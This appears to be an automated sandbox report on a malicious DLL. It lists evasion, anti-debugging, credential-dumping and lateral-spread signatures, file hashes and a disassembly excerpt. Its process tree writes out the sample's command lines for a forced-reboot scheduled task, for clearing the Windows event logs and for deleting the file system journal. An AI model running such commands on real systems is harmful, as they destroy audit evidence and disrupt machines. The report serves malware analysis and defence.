Performs an instant shutdown (NtRaiseHardError)Show sources
Source: C:\Windows\System32\rundll32.exeHard error raised: shutdown

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: rundll32.exeBinary or memory string: Progman
Source: rundll32.exeBinary or memory string: Program Manager
Source: rundll32.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F64CD8 SetUnhandledExceptionFilter,5_2_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00F64AB6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F64CD8 SetUnhandledExceptionFilter,5_1_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_00F64AB6
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\rundll32.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00F65F8E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,1_2_011E9367
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011EA073 GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,1_2_011EA073
Enables debug privilegesShow sources
Source: C:\Windows\System32\rundll32.exeProcess token adjusted: Debug
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Program exit pointsShow sources
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5851
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5775
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5906
Queries a list of all running processesShow sources
Source: C:\Windows\System32\rundll32.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: -3000
Enumerates the file systemShow sources
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Found decision node followed by non-executed suspicious APIsShow sources
Source: C:\Windows\System32\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-7255
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\dllhost.dat
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-3844
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\loaddll32.exe TID: 2720Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2792Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -2700000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1200000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -900000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776Thread sleep time: -540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2856Thread sleep time: -3540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2848Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776Thread sleep time: -180000s >= -60s
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Windows\System32\rundll32.exeFile opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F62566 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00F62566

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
Contains functionality to query local / system timeShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E84DF GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,wsprintfW,1_2_011E84DF
Contains functionality to query windows versionShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 309071 Sample:  abc.dll Startdate:  12/07/2017 Architecture:  WINDOWS Score:  100 0 loaddll32.exe main->0      started     9821reducedSig Signatures exceeded maximum capacity for this level. 11 signatures have been hidden. 9821sig Clears the journal log 9811sig Clears the windows event log 9881sig Connects to many different private IPs (likely to spread or exploit) 9823sig Clears the journal log 9865sig Contains functionality to dump credential hashes (LSA Dump) 9828sig Clears the journal log d1e290428reduced Connected ips exeeded maximum capacity for this level. 2 connected ips have been hidden. d1e290428 192.168.1.1, unknown unknown d1e290429 192.168.1.0, unknown unknown d1e290430 192.168.1.2, 80 unknown unknown d1e40558 F915.tmp, PE32 d1e40585 dllhost.dat, PE32 1 rundll32.exe 4 0->1      started     1->9821reducedSig 1->9821sig 1->9811sig 1->9881sig 1->d1e290428reduced 1->d1e290428 1->d1e290429 1->d1e290430 1->d1e40558 dropped 1->d1e40585 dropped 3 cmd.exe 1->3      started     5 F915.tmp 1->5      started     8 cmd.exe 1->8      started     3->9823sig 6 schtasks.exe 3->6      started     5->9865sig 8->9828sig 10 wevtutil.exe 8->10      started     11 wevtutil.exe 8->11      started     process0 process1 dnsIp1 fileCreated1 signatures1 process3 signatures3 process6 fileCreated0

Yara Overview

No Yara matches

Screenshot

windows-stand

Startup

  • system is w7_1
  • loaddll32.exe (PID: 2716 cmdline: loaddll32.exe 'C:\Users\user\Desktop\abc.dll' MD5: D2792A55032CFE825F07DCD4BEC5F40F)
    • rundll32.exe (PID: 2724 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • cmd.exe (PID: 2768 cmdline: /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • schtasks.exe (PID: 2824 cmdline: schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • F915.tmp (PID: 2800 cmdline: 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420} MD5: 2813D34F6197EB4DF42C886EC7F234A1)
      • cmd.exe (PID: 2868 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 2888 cmdline: wevtutil cl Setup MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2948 cmdline: wevtutil cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2960 cmdline: wevtutil cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2972 cmdline: wevtutil cl Application MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • fsutil.exe (PID: 2988 cmdline: fsutil usn deletejournal /D C: MD5: B4834F08230A2EB7F498DE4E5B6AB814)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
C:
  • Type: data
  • MD5: 50CF2382E783ADAA465FEEDD1DD36D11
  • SHA: A03E1F69DDBD94A6697E5447AD0B3D76381FEDF8
  • SHA-256: 3A954CE94ECA2286E3524407DB360CC9D809D8A861BC3E9EBA00715E044A33B5
  • SHA-512: D9094F9E2C8A44BE1CB966C5121CCD645E1A6A7F7339D28B4CB925A843AED8182937421BA6445C78E1D70793C5A9721E1B56AE0728A248AB17B73D6B77211E32
true
C:\README.TXT
  • Type: data
  • MD5: DEC0F31784A36435A9A8A2F4419E29C4
  • SHA: 131E51447D2CB7BD1D64C5EA6C78752D946E3558
  • SHA-256: C61506A25D135D19DEA2BE38718A800DA9821395EAD5AE356723D2BF089591CB
  • SHA-512: 7CE28F4D01E449AB61F7D6FB38264223EBC2C0FDA91D3E60AC6C3F21D654B67AEAC8B13097850779E77C71EA48EA01579B983C22B88150FB2335D5E9B79D868E
true
C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: B8DB74A05685A45BB1257EF3AD87C0AE
  • SHA: 8C23DD9DCC1989BEC7C2D026216DECD1FAE674C5
  • SHA-256: 225E05DC9B98D7A7D63CDE112D6F879FC0C7124FB564746B700DAC839653C2B9
  • SHA-512: D085682BBCCC42160C86FADAA45181A0859C4BAF1900C3C04338571672CAB57A610887B9D29F87CC49B604F8F0544A82C0096E41E58D15733E7FC3BC82A81C5C
true
C:\Users\user\Desktop\abc.dll
  • Type: data
  • MD5: 9A7FFE65E0912F9379BA6E8E0B079FDE
  • SHA: 532BEA84179E2336CAED26E31805CEAA7EEC53DD
  • SHA-256: 4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
  • SHA-512: E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
false
C:\Windows\dllhost.dat
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: AEEE996FD3484F28E5CD85FE26B6BDCD
  • SHA: CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
  • SHA-256: F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
  • SHA-512: E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
false
\Device\Harddisk0\DR0
  • Type: partition 2: ID=0x7, starthead 223, startsector 206848, 41734144 sectors, code offset 0x31
  • MD5: 2AAE6A1A720CFD62732FA7D13131D616
  • SHA: 4E43CF175A371E574D5FF21FACF777DB6E520652
  • SHA-256: 2E24E0203DD25DDDD95B1B574915AF282C9CF5AF42B7FFA46E94A855C1A3C386
  • SHA-512: 39A8B58044A950A3EC44F43D4B45C42E62E480F4450AC9E6EE1611A5703BB69908654078936C3E71E6011D759B08EBE64D94AD72323C0E68A7161ED8AC993D67
true
unknown
  • Type: ASCII text, with CRLF line terminators
  • MD5: F7B0D39E5B2B15C4CA6ACDAFE1A3CB9C
  • SHA: BAE8F0CC04A7E7218E1B57D84F784DB9246E6606
  • SHA-256: C3CD57E6E2D2C980B50245BE712785DCB0721A812C317292DAA7E99BA32A7362
  • SHA-512: A078E25F04800918B3E80490C64AEAA3B88E88DDAA6C8F963E6D0DFDC26BF8BE7440F3EB27253A5693DB4604604DB6BA3E42BB47B840CCAA47DE1428E66365A4
true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
192.168.1.1unknown
unknownunknownfalse
192.168.1.0unknown
unknownunknownfalse
192.168.1.2unknown
unknownunknownfalse
192.168.1.16unknown
unknownunknownfalse
192.168.1.13unknown
unknownunknownfalse

Static File Info

General

File type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:abc.dll
File size:362360
MD5:71b6a493388e7d0b40c83ce903bc6b04
SHA1:34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256:027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512:072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8/.jV|.jV|.jV|&$.|.jV|...|.jV|...|.jV|...|.jV|...|.jV|.jW|.jV|...|.jV|...|.jV|...|.jV|Rich.jV|................PE..L...\(FY...

File Icon

Static PE Info

General

Entrypoint:0x10007d39
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5946285C [Sun Jun 18 07:14:36 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:52dd60b5f3c9e2f17c2e303e8c8d4eab

Authenticode Signature

Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
  • 12/7/2009 11:40:29 PM 3/7/2011 11:40:29 PM
Subject Chain
  • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Serial:6101CF3E00000000000F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+0Ch]
dec eax
jne 0E4F04A1h
mov eax, dword ptr [ebp+08h]
push eax
mov dword ptr [1001F120h], eax
call dword ptr [1000D0E0h]
xor eax, eax
inc eax
pop ebp
retn 000Ch
push ebp
mov ebp, esp
call 0E4F12FBh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 0E4F0494h
mov dword ptr [ecx], eax
xor eax, eax
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000618h
push esi
xor esi, esi
cmp dword ptr [1001F0FCh], esi
je 0E4F04F0h
cmp dword ptr [1001F11Ch], esi
je 0E4F04E8h
mov eax, dword ptr [ebp+08h]
lea edx, dword ptr [eax+02h]
mov cx, word ptr [eax]
add eax, 02h
cmp cx, si
jne 0E4F0487h
sub eax, edx
sar eax, 1
push eax
push dword ptr [ebp+08h]
push 100140D0h
call 0E